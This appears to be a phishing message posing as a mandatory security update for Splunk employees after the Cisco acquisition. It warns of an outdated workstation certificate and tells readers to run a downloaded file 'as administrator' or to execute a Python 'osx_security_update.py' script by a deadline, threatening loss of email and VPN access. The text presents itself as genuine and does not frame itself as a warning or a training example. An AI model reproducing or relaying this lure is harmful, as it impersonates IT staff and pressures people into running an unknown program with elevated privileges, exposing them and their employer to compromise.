Required security update for all Splunk employees

IMPORTANT: Your workstation's security certificate is outdated and requires immediate attention. This update must be completed by April 4th, 2025 to maintain access to critical Splunk and Cisco systems.

Following the recent Cisco acquisition, we are implementing enhanced security protocols across all Splunk systems. Our security monitoring has detected that your workstation's security certificate is outdated and requires immediate attention.

Run the updater with administrator privileges

For Windows users, right-click on the downloaded file and select "Run as administrator". For OSX users, open your terminal app and run with "python3 ./osx_security_update.py"

Allow the update utility to complete

Depending on how far behind your system is in the update cycle, the update process may take up to 30 minutes to complete. If it takes longer than 30 minutes, please open a support ticket with Cisco IT.

Note: Failure to update your security certificate by the deadline could result in loss of access to critical Splunk and Cisco systems, including email and VPN.
